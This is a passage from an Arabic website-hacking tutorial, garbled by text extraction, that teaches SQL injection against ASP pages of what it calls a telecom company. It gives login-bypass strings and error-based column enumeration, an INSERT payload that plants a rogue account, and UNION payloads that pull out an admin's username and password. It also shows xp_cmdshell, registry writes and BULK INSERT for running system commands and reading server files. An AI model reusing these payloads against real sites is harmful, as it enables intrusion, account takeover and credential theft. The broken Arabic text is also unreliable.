‫ﺘ ﺤﻘ ﻖ ﻣﻦ ﻋﺪةأﺷﯿﺎ ء‬‫ـ ‪ SQL‬ﻮﻫﻮ ﻣﺎ ﯾﺄﺗﻲﺑﻌﺪ ‪ WHERE‬ﯾ‬ ‫ﺘﻨﺒﻪﻷﻧﻪ رﺑﻤﺎ ﯾﻜﻮناﻟﺸ ﺮطﻓﻲأﻣ ﺮاﻟ‬ ‫ﯾﺠﺐاﻟ‬
‫ﺘﻌﺎ ﺿﻪ ﻋﻦ ﻣﺎأد ﺧﻼﻧﺎهﻗﺒ ﻞ‬
‫ﺘﻢإﻫﻤﺎ لﺑﻘﯿﺔاﻟﺴﻄ ﺮ ‪ ،‬ﺣﯿﺚ ﯾﻤﻜﻨﻨﺎاﻹﺳ‬ ‫ﺘﺨﺪم )‪-- (two dashes‬ﻟﯿ‬ ‫ﻟﺬﻟﻚ ﻧﺴ‬
‫ﺘﺎﻟﯿﻪ‬‫ﻗﻠﯿ ﻞﺑﺎﻟﻤﺪ ﺧﻼ تاﻟ‬
‫ﺘﺨﺪم‪: blah' OR '1'='1'--‬‬ ‫ﺄﺳﻢ ﻣﺴ‬
‫ﺘﻬﻤﻠﻬﺎﻷﻧﻬﺎﺗﺄﺗﻲﺑﻌﺪاﺳﻢ‬ ‫ﺘﺎﺑﺔﻛﻠﻤﺔ ﻣ ﺮورﻷن ‪ --‬ﺳ‬ ‫ﻮﻛﺬﻟﻚﻛﻠﻤﺔاﻟﻤ ﺮور )ﻓﻲﺑﻌ ﺾاﻟ ﺤﺎﻻ ت ﯾﻤﻜﻨﻚإﻫﻤﺎ لﻛ‬
‫ـ‪SQL‬‬ ‫ﺘﺨﺪمﻓﻲأﻣ ﺮاﻟ‬ ‫اﻟﻤﺴ‬

‫ﺘﺨﻤﯿﻦأ ﺣﺪأﺳﻤﺎ ءاﻷﻋﻤﺪه‬


‫ﺘﺎجﻟ‬
‫ﺗﻮﺟﺪ ﻃ ﺮﯾﻘﻪ ﻣ ﺮﯾ ﺤﻪ ﺟﺪا وﻣ ﻀﻤﻮﻧﻪﺑ ﺤﯿﺚأﻧﻚﻟﻦﺗ ﺤ‬
‫ﺘﺨﺪام‪having clause‬‬ ‫ﻮﻫﻲﺄﺳ‬
‫ﺘﺎﻟﯿﻪ‬‫ﺑﺎﻟﻄ ﺮﯾﻘﻪاﻟ‬
‫ﺘﺨﺪم'‪--having 1=1‬‬ ‫ﺄﺳﻢ ﻣﺴ‬
‫ﺘﺎﻟﯿﻪ‬
‫ﺣﯿﺚ ﺳﻨ ﺤﺼ ﻞ ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻄﺄﻛﺎﻟ‬
‫'‪Microsoft OLE DB Provider for ODBC Drivers error '80040e14‬‬

‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Column‬‬


‫‪'cs_isp_user.UserID' is invalid in the select list because it is not‬‬
‫‪contained in an aggregate function and there is no GROUP BY clause.‬‬

‫‪١ ٦٧‬‬
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb

/Arabic/Scripts/ar_csd_reply.asp, line 33
‫ﻮﺑﻬﺎأﺳﻢاﻟﺠﺪو ل وأﯾ ﻀﺎأﺳﻢﺄو ل ﻋ ﻤﻮد‬
‫ﺘﻄﯿﻊاﻟ ﺤﺼﻮ ل ﻋﻠﻰاﺳﻤﺎ ءﺑﻘﯿﺔاﻷﻋﻤﺪه‬ ‫ﺑﻌﺪﻫﺎﻟﻨﺴ‬
group by‫ﺘﺨﺪم‬ ‫ﺳﻨﺴ‬
‫ﺘﺎﻟﻲ‬
‫ﺑﺎﻟﺸﻜ ﻞاﻟ‬
--group by cs_isp_user.UserID'
passwd‫ﺑﻌﺪﻫﺎ ﺳﻨ ﺤﺼ ﻞ ﻋﻠﻰ ﻋﻤﻮدﺄﺳﻤﻪ‬
‫ﺘﺎﻟﻲ‬
‫ﺘﺨﺪﻣﻪﻟﻠ ﺤﺼﻮ ل ﻋﻠﻰاﺳﻢاﻟﻌﻤﻮداﻟﻠﻲ ﯾﻠﯿﻪﺑﺎﻟﺸﻜ ﻞاﻟ‬ ‫ﻓﻨﺴ‬
--group by cs_isp_user.UserID,cs_isp_user.passwd'
! ‫ﺘﺨﺪم ﺧﺎ ﻃﺊ‬
‫ﻮﻧﻜ ﺮر زﯾﺎدةأﺳﻢﻛ ﻞ ﺟﺪو ل ﻣﻊاﻟﻌﻤﻮدﺈﻟﻰأن ﻧ ﺤﺼ ﻞ ﻋﻠﻰ ﺻﻔ ﺤﺔﺗﺨﺒ ﺮﻧﺎﺑﺄنأﺳﻢاﻟﻤﺴ‬

‫ﺘﺎجاﻷنأن ﻧﻘﻮمﺑﺠﻤﻊأﻛﺒ ﺮﻗﺪر ﻣﻤﻜﻦ ﻣﻦأﺳﻤﺎ ءاﻷﻋﻤﺪهﻓﻲ ﻫﺬااﻟﺠﺪو ل‬ ‫ﻧﺤ‬


:‫ﺘﺎﻟﻲ‬
‫ﻧﻘﻮمﺑﺈد ﺧﺎ لاﻟ‬
: blah' group by (username)--‫ﺘﺨﺪم‬ ‫ﺄﺳﻢ ﻣﺴ‬
: ‫ﺘﺎﻟﻲ‬
‫ﻓﻨ ﺤﺼ ﻞ ﻋﻠﻰاﻟﺨﻄﺄاﻟ‬

: ‫ﺘﺒﺎس‬
‫ﻗ‬‫ا‬

Microsoft OLE DB Provider for ODBC Drivers error


'80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid
column name 'username'.
/arabic/Scripts/ar_csd_reply.asp, line 33

username‫ﻮﻫﻮ ﻣﺎ ﯾﻔﯿﺪﺑﺄﻧﻪ ﻻ ﯾﻮﺟﺪ ﻋﻤﻮدﻓﻲ ﻫﺬااﻟﺠﺪو لﻟﻪاﻷﺳﻢ‬


password ,username,id,userid,email‫ﺘﺠ ﺮﺑﻪاﻷﺳﻤﺎ ءاﻟﺸﺎﺋﻌﻪ ﻣﺜ ﻞ‬ ‫ﻧﻘﻮمﺑ‬
,first_name
‫ﻓﺄﻧﻨﺎ ﻧ ﺤﺼ ﻞ ﻋﻠﻰ ﺧﻄﺄأ ﺧ ﺮ وﻫﻮ ﻣﺎ ﻧﺒ ﺤﺚ ﻋﻨﻪ‬userid ‫ـ‬‫ﺘﻨﺎﻟ‬
‫ﻋﻨﺪﺗﺠ ﺮﺑ‬

: ‫ﺘﺒﺎس‬
‫ﻗ‬‫ا‬

Microsoft OLE DB Provider for ODBC Drivers error


'80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column

١ ٦٨
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪'cs_isp_user.passwd' is invalid in the select list because it is‬‬


‫‪not contained in either an aggregate function or the GROUP‬‬
‫‪BY clause.‬‬
‫‪/arabic/Scripts/ar_csd_reply.asp, line 33‬‬

‫ﺘﯿﻦ وﻫﻲأﺳﻢاﻟﺠﺪو ل وﻫﻮ‪cs_isp_user‬‬ ‫ﻫﻨﺎ ﺣﺼﻠﻨﺎ ﻋﻠﻰ ﻣﻌﻠﻮﻣ‬


‫ﻮأﯾ ﻀﺎﺄﺳﻢأ ﺣﺪاﻷﻋﻤﺪه وﻫﻮ‪passwd‬‬
‫ﺘﺨﺪاماﺳﻢ ﺎﻟﻌﻤﻮداﻟﺠﺪﯾﺪ‬
‫ﺘﻜ ﺮاراﻟﻌﻤ ﻞاﻟﺴﺎﺑ ﻖ وﻟﻜﻦﺑﺈﺳ‬
‫ﻧﻘﻮماﻻنﺑ‬
‫ﺘﺎﻟﻲ‪: blah' group by (passwd)--‬‬ ‫ﺘﺨﺪماﻟ‬ ‫ﻓﻨﻘﻮمﺑﺈد ﺧﺎ لأﺳﻢاﻟﻤﺴ‬
‫ﺘﺎﻟﻲ ‪:‬‬‫ﻓﻨ ﺤﺼ ﻞ ﻋﻠﻰاﻟﺨﻄﺄاﻟ‬

‫ﺘﺒﺎس ‪:‬‬
‫ﻗ‬‫ا‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬


‫'‪'80040e14‬‬
‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Column‬‬
‫‪'cs_isp_user.UserID' is invalid in the select list because it is‬‬
‫‪not contained in either an aggregate function or the GROUP‬‬
‫‪BY clause.‬‬
‫‪/arabic/Scripts/ar_csd_reply.asp, line 33‬‬

‫ﺘﺨﻤﯿﻨﻪ وﻫﻮ‪userid‬‬ ‫ﺣﺼﻠﻨﺎ ﻋﻠﻰأﺳﻢ ﻋﻤﻮد وﻫﻮ ‪ UserID‬ﻮﻫﻮ ﻧﻔﺴﻪ ﻣﺎﻗﻤﻨﺎﺑ‬


‫ﺗﺠﺪراﻹﺷﺎرهإﻟﻰأن ‪MS SQL Server‬ﻟﯿ ﺲ ﺣﺴﺎسﻟ ﺤﺎﻟﺔاﻷ ﺣ ﺮ ف ‪(:‬‬
‫ﺘﻬﯿﻪ وﻻ ﻧ ﺤﺼ ﻞإﻻ ﻋﻠﻰأﺳﻤﺎ ءاﻟﺠﺪاو ل ‪ UserID‬ﻮ‪passwd‬‬ ‫ﻧﻼ ﺣﻆﺄﻧﻨﺎ ﺳﻨﻜﻮنﻓﻲ ﺣﻠﻘﻪ ﻏﯿ ﺮ ﻣﻨ‬
‫ﺘﻲ ﺣﺼﻠﻨﺎ ﻋﻠﯿﻬﺎ‬ ‫ﺈذناﻟﺠﺪو ل ﻻ ﯾ ﺤﻮيإﻻ ﻋﻠﻰ ﻋﻤﻮدﯾﻦ وﻫﻲاﻟ‬
‫ﺘﺨﺪم ﺟﺪﯾﺪﻟﻠﺠﺪو ل وﺑﻌﺪﻫﺎ ﻧﻘﻮمﺑﺎﻟﺪ ﺧﻮ لﺑﺸﻜ ﻞ ﻃﺒﯿﻌﻲ ﻣﻦ ﺎﻟﺼﻔ ﺤﻪ‬‫ﺈذنﻓﻲ ﺎﻟ ﺤﺎﻟﻪ ﻫﺬه ﻧﻘﻮمﺑﺄد ﺧﺎ ل ﻣﺴ‬
‫ﺘﺴﺠﯿ ﻞاﻟﺪ ﺧﻮ ل ‪(:‬‬ ‫اﻟﺨﺎﺻﻪﺑ‬
‫ﺘﺨﺪم ‪blah' INSERT INTO :‬‬ ‫ﺘﺎﻟﻲﻓﻲ ﺧﺎﻧﺔأﺳﻢاﻟﻤﺴ‬ ‫ﺘﺎﺑﺔاﻟ‬‫ﺳﻨﻘﻮمﺑﻜ‬
‫‪cs_isp_user(UserID,passwd‬‬
‫‪) VALUES('M_3','hi')--‬‬
‫ﺘﺨﺪم ‪ M_3‬ﻮﻛﻠﻤﺔ ﻣ ﺮور‪hi‬‬ ‫ﺘﺨﺪم ﺟﺪﯾﺪﻟﻪأﺳﻢ ﻣﺴ‬ ‫ﺘﻢإ ﺿﺎﻓﺔ ﻣﺴ‬ ‫ﺣﯿﺚ ﺳﯿ‬
‫ﺘﻄﯿﻊاﻟﺪ ﺧﻮ لﻟﻠﺼﻔ ﺤﺔاﻟﻤ ﺤﻤﯿﻪﺑﻬﺬهاﻟﺒﯿﺎﻧﺎ ت ﻋﻠﻰأﻧﻚ ﻣﺨﻮ لﻟﻪﺑﺎﻟﺪ ﺧﻮ ل‬ ‫ﻮﺑﻌﺪﻫﺎﺗﺴ‬

‫ﺘﻐﻼ لأﻣﻜﺎﻧﯿﺔ ﻋﻤ ﻞ ‪inject‬ﻟﻬﺎ وﻟﻜﻨﻨﺎ ﺳﻨﻜﻤ ﻞاﻟ ﺤﺪﯾﺚ ﻋﻦ ﻃ ﺮﯾﻘﻪ‬


‫ﺘﻬﯿﻨﺎ ﻣﻦاﺳ‬
‫ﻓﻲ ﻣﺜﺎﻟﻨﺎ )ﺷ ﺮﻛﺔ ﺎﻹﺗﺼﺎﻻ ت(أﻧ‬

‫‪١ ٦٩‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﻄﯿﻊاﻟﺪ ﺧﻮ لﺑﺄي ﻣﻨﻬﺎ دون‬ ‫ﺘﺨﺪﻣﯿﻦ وﻛﻠﻤﺎ ت ﻣ ﺮورﻫﻢ وﺑﻌﺪﻫﺎﺗﺴ‬


‫ﺘﻄﺒﻊﻗ ﺮاﺋﺔاﺳﻤﺎ ءاﻟﻤﺴ‬ ‫ﺘﻌﻪﻟﻜﻲ ﻧﺴ‬ ‫ﻣﻤ‬
‫إ ﺿﺎﻓﺔ ﻧﻔﺴﻚ‬
‫ﻮﻫﻮاﻷﻣ ﺮاﻟﺬيﻟﻦ ﯾ ﻀﻊ ﺷﻜﻮك ﺣﻮ ل وﺟﻮدﻟﺸﺨ ﺺ ﻣﺸﺒﻮه‬
‫ﻗﻢ(‬
‫ﺘﺨﺪم )ﺗﺬﻛ ﺮأﻧﻪ ر‬ ‫ﻗﻢﺗﺴﻠﺴﻠﻲﻟﻜ ﻞ ﻣﺴ‬ ‫ﺳﻨﻜﻤ ﻞ ﻣﺎﺑﺪأﻧﺎه وﻟﻜﻦﺑﺈ ﺿﺎﻓﺔ ﻋﻤﻮدأ ﺧ ﺮﻟﻪاﻷﺳﻢ ‪ id‬ﻮﻫﻮ ر‬
‫ﺈذنﻟﺪﯾﻨﺎ ﺟﺪو لأﺳﻤﻪ‪user‬‬
‫ﺘﺎﻟﯿﻪ‬
‫ﯾ ﺤﻮياﻻﻋﻤﺪهاﻟ‬
‫ﻗﻢ ﺻ ﺤﯿﺢ‬‫‪id‬ﻮﻫﻮ ر‬
‫ﻗﺎم( ﻣﺜﺎ ل‪admin1‬‬ ‫‪username‬ﻮﻫﻮﻗﯿﻤﺔ ﻧﺼﯿﻪ )اﻟﻘﯿﻢاﻟﻨﺼﯿﻪ ﯾﻤﻜﻦأنﺗ ﺤﻮيأر‬
‫‪passwd‬ﻮﻫﻲأﯾ ﻀﺎﻗﯿﻤﻪ ﻧﺼﯿﻪ‬

‫ﺘ ﺤﻮﯾ ﻞ وﻟﻜﻨﻪ ﺳﯿﺨ ﺮج رﺳﺎﻟﻪ ﺧﻄﺄ‬


‫ﺘﻢاﻟ‬
‫ﻧﺠ ﺮب ﻋﻤ ﻞ ‪union‬ﻟﻘﯿﻤﻪ ﻧﺼﯿﻪ ﻮﺗ ﺤﻮﯾﻠﻬﺎإﻟﻰﻗﯿﻤﺔ ﻋﺪدﯾﻪ )ﻟﻦ ﯾ‬
‫ﺛﻤﯿﻨﻪ ﺟﺪا(‬
‫ﺘﺨﺪم‪: blah' union SELECT username FROM user‬‬ ‫ﻧﺪ ﺧ ﻞاﺳﻢاﻟﻤﺴ‬
‫ﻮ ﺳﻨ ﺤﺼ ﻞ ﻋﻠﻰ ﺮﺳﺎﻟﺔ ﺧﻄﺄ ﻻﺗﻔﯿﺪﻧﺎﻓﻲ ﺷﻲ ء‬
‫ﺮﺳﺎﻟﺔاﻟﺨﻄﺄﻫﻲ‬

‫ﺘﺒﺎس ‪:‬‬
‫ﻗ‬‫ا‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬


‫'‪'80040e14‬‬
‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]All queries‬‬
‫‪in an SQL statement containing a UNION operator must have‬‬
‫‪an equal number of expressions in their target lists.‬‬
‫‪/admin/admin.asp, line 13‬‬

‫ﺘﺎﻟﻲ‬‫ﺘﺼﺒﺢﺑﺎﻟﺸﻜ ﻞاﻟ‬ ‫ﻧﻘﻮمﺑﺰﯾﺎدة ‪ id‬ﻣ ﺮه وا ﺣﺪﻓ‬


‫‪blah' union SELECT username,username FROM user‬‬
‫ﻓﻨ ﺤﺼ ﻞ ﻋﻠﻰ ﻧﻔ ﺲ رﺳﺎﻟﺔاﻟﺨﻄﺄ‬
‫ﺘﻠﻔﻪ‬‫ﺘﺎﺑﻊاﻟﺰﯾﺎدهﺈﻟﻰأن ﻧ ﺤﺼ ﻞ ﻋﻠﻰ رﺳﺎﻟﺔ ﺧﻄﺄ ﻣﺨ‬ ‫ﻧ‬
‫ﺘﺎﻟﻲ‬
‫ﺘﺨﺪماﻟ‬‫ﺘ ﺮ ضأﻧﻨﺎ ﺣﺼﻠﻨﺎ ﻋﻠﻰ رﺳﺎﻟﺔاﻟﺨﻄﺄاﻟﺠﺪﯾﺪه ﻋﻨﺪأد ﺧﺎ لاﺳﻢاﻟﻤﺴ‬ ‫ﻟﻨﻔ‬
‫‪blah' union SELECT username,username,usernam‬‬
‫‪e,username,username FROM user‬‬
‫ﺘﺎﻟﯿﻪ‬
‫ﻓﻨ ﺤﺼ ﻞ ﻋﻠﻰ رﺳﺎﻟﺔ ﺎﻟﺨﻄﺄاﻟ‬

‫‪١ ٧٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺒﺎس ‪:‬‬
‫ﻗ‬‫ﺎ‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬


‫'‪'80040e07‬‬
‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax‬‬
‫‪error converting the‬‬
‫‪varchar value 'Lame_Admin' to a column of data type int.‬‬
‫‪/admin/admin.asp, line 13‬‬

‫ً ﻣﺎ ﯾﻜﻮنﻟﻸدﻣﻦ‬ ‫ﺘﺨﺪم وﻫﻮ ﻋﺎدة‬‫)‪ :‬ﺣﺼﻠﻨﺎ ﻋﻠﻰأو لأﺳﻢ ﻣﺴ‬


‫ﺘ ﺤﻮﯾ ﻞﻗﯿﻤﺔ ﻧﺼﯿﻪ )وﻫﻲ‬
‫ﻮﺳﺒﺐ ﻇﻬﻮر ﻫﺬااﻟﺨﻄﺄ ﻫﻮﻷﻧﻨﺎ ﻧﻄﻠﺐ ﻣﻦ ﻣ ﺤ ﺮك ‪SQL‬ﺄن ﯾﻘﻮمﺑ‬
‫)‪Lame_Admin‬ﺈﻟﻰﻗﯿﻤﺔ ﻋﺪدﯾﻪ ﺻ ﺤﯿ ﺤﻪ)‪( int‬‬
‫ﺘﻄﯿﻊﺗ ﺤﻮﯾ ﻞ ‪Lame_Admin‬ﺈﻟﻰﻗﯿﻤﺔ ﻋﺪدﯾﻪ‬ ‫ﻮﻫﻮاﻟﺸﻲ ءاﻟﻐﯿ ﺮ ﻣﺴﻤﻮ ح ‪،‬ﻟﺬﻟﻚ ﯾﻘﻮمﺑﺄ ﺧﺒﺎركأﻧﻪ ﻻ ﯾﺴ‬
‫ﺻ ﺤﯿ ﺤﻪ ‪(:‬ﻫﺬاأذﻛﻰ ﺷﻲﻗﺎﻣ ﺖ ‪microsoft‬ﺑﻌﻤﻠﻪ ‪(:‬‬
‫ﺘﺨﺪم وﺳﻨ ﺤﺎو لاﻟ ﺤﺼﻮ ل ﻋﻠﻰﻛﻠﻤﺔ ﺎﻟﻤ ﺮور‬‫ﺎﻻن ﺣﺼﻠﻨﺎ ﻋﻠﻰأﺳﻢاﻟﻤﺴ‬
‫ﺘﺎﻟﻲ‪:blah' union SELECT passwd,passwd,passwd,pass‬‬ ‫ﺘﺨﺪماﻟ‬‫ﻧﺪ ﺧ ﻞأﺳﻢاﻟﻤﺴ‬
‫‪wd,passwd FROM user‬‬
‫ﺘﺨﺪم‬‫ﺑﻨﻔ ﺲاﻟﻌﺪداﻟﺴﺎﺑ ﻖ ﻋﻨﺪ ﺣﺼﻮﻟﻨﺎ ﻋﻠﻰأﺳﻢاﻟﻤﺴ‬
‫ﺳﻨ ﺤﺼ ﻞ ﻋﻠﻰﻫﺬااﻟﺨﻄﺄ‬

‫ﺘﺒﺎس ‪:‬‬
‫ﻗ‬‫ا‬

‫‪Microsoft OLE DB Provider for ODBC Drivers error‬‬


‫'‪'80040e07‬‬
‫‪[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax‬‬
‫‪error converting the‬‬
‫‪varchar value 'stupid' to a column of data type int.‬‬
‫‪/admin/admin.asp, line 13‬‬

‫ﺛ ﺮﻟﻨﺎ‬
‫ﺘﺨﺪم وﻛﻠﻤﺔاﻟﻤ ﺮور وﯾﻤﻜﻨﻨﺎﺗﺴﺠﯿ ﻞاﻟﺪ ﺧﻮ لﻟﻠﺼﻔ ﺤﺔ ﺎﻟﻤ ﺤﻤﯿﻪﺑﺪون وﺟﻮدأيأ‬
‫ﺣﺼﻠﻨﺎ ﻋﻠﻰأﺳﻢاﻟﻤﺴ‬
‫ﻗﻢاﻻﯾﺒﻲﻷ ﺧ ﺮ ﺷﺨ ﺾ‬
‫ﺈﻻإذاﻛﺎﻧ ﺖاﻟﺼﻔ ﺤﻪاﻟﻤ ﺤﻤﯿﻪ ﻋﻨﺪاﻟﺪ ﺧﻮ لﻟﻬﺎﺗﻘﻮمﺑﻄﺒﺎﻋﺔﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ ت ﻣﺜ ﻞ ر‬

‫‪١ ٧١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﺘﺨﺪم ﻫﺬا‬
‫ﻗﺎمﺑﺎﻟﺪ ﺧﻮ لﺑﺈﺳﻢاﻟﻤﺴ‬
‫ﺘﻘﻮمﺑﻪﺑﻨﻔﺴﻚ‬‫ﻋﻨﺪﻫﺎﻓﻜ ﺮﺑﻤﺎ ﺳ‬

‫ـ ‪Stored Procedure‬‬ ‫ﺑﻘﻲأﺗﻜﻠﻢ ﻋﻦاﻟ‬


‫ﻗ ﺮبﺈﻟﻰأدوا ت ﻣﻮﺟﻮده ﻣﺴﺒﻘﺎ ‪Built-in‬ﺗﻘﻮمﺑﻌﻤ ﻞ ﻣ ﺤﺪد ﻋﻨﺪ ﻃﻠﺒﻬﺎ‬‫ﺘﺸﺒﯿﻪأ‬
‫ﻮﻫﻲﻛ‬

‫ﺘﺨﺪم‬
‫ـ ‪ SQL Server‬ﯾﻌﻤ ﻞ ﻋﻠﻰاﻟﻤﺴ‬ ‫ـ ‪Stored Procedure‬ﺈذاﻛﺎناﻟ‬ ‫ﺘﻔﺎده ﻣﻦاﻟ‬‫ﺘﻄﯿﻊ ﺎﻹﺳ‬
‫ﺘﺴ‬‫ﺳ‬
‫‪sa‬‬
‫ﺘﺨﺪاﻣﻬﺎ‬
‫ٍﺳ‬
‫ـ ‪SQL Server‬ﺗﻢاﻟﺴﻤﺎ حﻟﻪﺑﺎ‬ ‫ﺘﺨﺪماﻟﺬي ﯾﻌﻤ ﻞ ﻋﻠﯿﻪاﻟ‬ ‫ﺄوإذاﻛﺎناﻟﻤﺴ‬

‫ﻟﺬﻟﻚﻓﺄﻧ ﺖ ﻣ ﺤﻈﻮظ ﻋﻨﺪ ﺣﺼﻮﻟﻚ ﻋﻠﻰ ‪SQL Server‬ﺑﻬﺬهاﻷﻣﻜﺎﻧﯿﺎ ت‬

‫ﯾﻮﺟﺪأﻛﺜ ﺮ ﻣﻦ ‪Stored Procedure ١٠٠‬‬


‫ﺘﺎﻟﻲﺄﻫﻤﻬﺎ‬
‫ﻓﻲاﻟﺠﺪو لاﻟ‬
‫‪+---------------------------+-----------------------------------------------------------------------‬‬
‫‪-------+‬‬
‫ﺘﺨﺪم(‪----‬‬ ‫ﺘﻢﺗﻨﻔﯿﺬه ﻋﻠﻰ ﺣﺴﺐ ﺻﻼ ﺣﯿﺎ ت ﺎﻟﻤﺴ‬ ‫ﺘﺸﻐﯿ ﻞ ) ﯾ‬‫|‪| xp_cmdshell----------‬ﺗﻤ ﺮﯾ ﺮأﻣ ﺮﻟﻨﻈﺎماﻟ‬
‫‪|---‬‬
‫ﺘ ﺮي‪---------------------------------------‬‬ ‫ﺘﺎ حﻓﻲ ﺎﻟ ﺮﯾﺠﺴ‬ ‫ﻗ ﺮا ءةﻗﯿﻤﺔ ﻣﻔ‬ ‫|‪| xp_regread-----------‬‬
‫‪|-----‬‬
‫ﺘ ﺮي‪--------------------------------------------‬‬ ‫ﺘﺎ ح ﻣﻦاﻟ ﺮﯾﺠﺴ‬‫|‪ | xp_regdeletekey----‬ﺣﺬ ف ﻣﻔ‬
‫‪|-----‬‬
‫ﺘ ﺮي‪----------------------------------------‬‬ ‫ﺘﺎ ح ﻣﻦ ﺎﻟ ﺮﯾﺠﺴ‬‫|‪ | xp_regdeletevalue-‬ﺣﺬ فﻗﯿﻤﺔ ﻣﻔ‬
‫‪|----‬‬
‫ﺘ ﺮي‪-------------------------------------------------‬‬ ‫ﺘﺎﺑﺔﻓﻲ ﺎﻟ ﺮﯾﺠﺴ‬ ‫|‪| xp_regwrite ----------‬ﻟﻠﻜ‬
‫‪|------‬‬
‫|‪| xp_servicecontrol--‬ﻟﺒﺪأأوأﻧﻬﺎ ء ﺧﺪﻣﺔ ﻋﻠﻰ ﺎﻟﺴﯿ ﺮﻓ ﺮ‪----------------------------------------‬‬
‫‪|----‬‬
‫‪+----------------------------+----------------------------------------------------------------------‬‬
‫‪-------+‬‬

‫ﺘﺎﻟﻲ‬
‫ـ ‪Procedure‬ﻓﻬﻲﺑﺎﻟﺸﻜ ﻞاﻟ‬
‫ﺘﻔﺎده ﻣﻦأي ﻣﻦ ﻫﺬهاﻟ‬
‫أﻣﺎ ﻃ ﺮﯾﻘﺔاﻹﺳ‬
‫‪'exec master..xp_cmdshell 'dir‬‬

‫ﺘﺨﺪام ‪ xp_cmdshell‬ﻮاﻟﺒﻘﯿﻪ ﻣﺜﻠﻪ‬ ‫ﻫﺬا ﻣﺜﺎ لﻟﻄ ﺮﯾﻘﺔأﺳ‬


‫ﺘﺎﻟﻲ‬
‫ﺘ ﺮيﻓﻬﻮﺑﺎﻟﺸﻜ ﻞاﻟ‬
‫ﺘﺎﺑﺔﻓﻲاﻟ ﺮﯾﺠﺴ‬‫ﻋﺪااﻟﻜ‬
‫‪'exec master..xp_regwrite 'REGISTERY KEY' VALUE‬‬

‫‪١ ٧٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ﻗﻊ ﻋﻦ ﻃ ﺮﯾ ﻖإ ﺿﺎﻓﺔ ﺟﺪو ل‬


‫ﺘﻲ ﯾﻌﻤ ﻞ ﻋﻠﯿﻬﺎاﻟﻤﻮ‬
‫أﯾ ﻀﺎﺑﻘﻲاﻹﺷﺎرهإﻟﻰأﻧﻪﺑﺄﻣﻜﺎﻧﻚﻗ ﺮا ءةﻛﻮد ﻣﻠﻔﺎ ت ‪ asp‬ﺎﻟ‬
‫ﺟﺪﯾﺪ وﻣﻦﺛﻢ ﻧﺴ ﺦﻛﻮد ﺻﻔ ﺤﺔ ‪ asp‬ﻮو ﺿﻌﻪ‬

‫ﺘﺎﻟﯿﻪ‬‫ﻓﻲ ﻫﺬااﻟﺠﺪو لﺑﺎﻟﻄ ﺮﯾﻘﺔاﻟ‬


‫‪((CREAT TABLE M_3 ( source varchar(8000‬‬
‫ﻫﺬااﻟﺴﻄ ﺮ ﯾﻘﻮمﺑﺒﻨﺎ ءاﻟﺠﺪو ل وأﺳﻢاﻟﺠﺪو ل ‪ M_3‬ﻮﺑﺪا ﺧﻠﻪ ﻋﻤﻮد وا ﺣﺪ ﻣﻦ ﺎﻟﻨﻮ ع ‪ varchar‬ﺣﺠﻤﻪ‬
‫‪٨٠٠٠‬ﺑﺎﯾ ﺖ‬

‫ﺘﺎﻟﻲ‬
‫ﺘﻪﺑﺎﻟﺸﻜ ﻞاﻟ‬
‫ﺑﻌﺪ ذﻟﻚﺑﺄﻣﻜﺎﻧﻚاﻻنإ ﺿﺎﻓﺔأي ﻣﻠ ﻒ ﻋﻠﻰاﻟﺴﯿ ﺮﻓ ﺮﺈﻟﻰ ﻫﺬااﻟﺠﺪو ل وﻣﻦﺛﻢﻗ ﺮاﺋ‬
‫‪'bulk insert M_3 from 'c:\InetPub\wwwroot\login‬‬
‫‪.asp‬‬

‫ﻮﻟﻘ ﺮاﺋﺔ ﻣﺎﺗﻢ ﻧﺴﺨﻪ ﯾﻤﻜﻨﻚ ذﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖ رﺳﺎﺋ ﻞ ﺎﻟﺨﻄﺄاﻟﻠﻲﺗﻜﻠﻤﻨﺎ ﻋﻨﻬﺎﻓﻲاﻟﻤﻮ ﺿﻮ عاﻟﺴﺎﺑ ﻖ‬
‫ﺘﻢﺗﻮﻟﯿﺪ ﺮﺳﺎﻟﺔ ﺧﻄﺄﺑﻬﺎ ﻣﺎﺗﻢ ﻧﺴﺨﻪ‪....‬‬ ‫ﺄﺳﻬﻠﻬﺎ ﻫﻮ ﻋﻤ ﻞ ‪ union‬ﺣﯿﺚ ﯾ‬

‫‪١ ٧٣‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫" درس ﻹﺣﱰاف اﳍﺎك ﰲ اﺧﱰاق اﳌﻮاﻗﻊ "‬

‫‪$$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪CONIK:‬‬
‫‪$$$$$$$$$$‬‬

‫ﺲ‪ -:‬ﻣﺎﻫﻲاﻟﺜﻐ ﺮا ت وﻣﺎ ﻣﻌﻨﺎﻫﺎ ؟؟‬


‫ﻗﺪﺗﻜﻮنأﯾ ﻀﺎاﻟﻄ ﺮﯾﻘﺔاﻟﻤﺴﺎﻋﺪة‬
‫ﻗﻪ و‬
‫ﺘ ﺮا‬
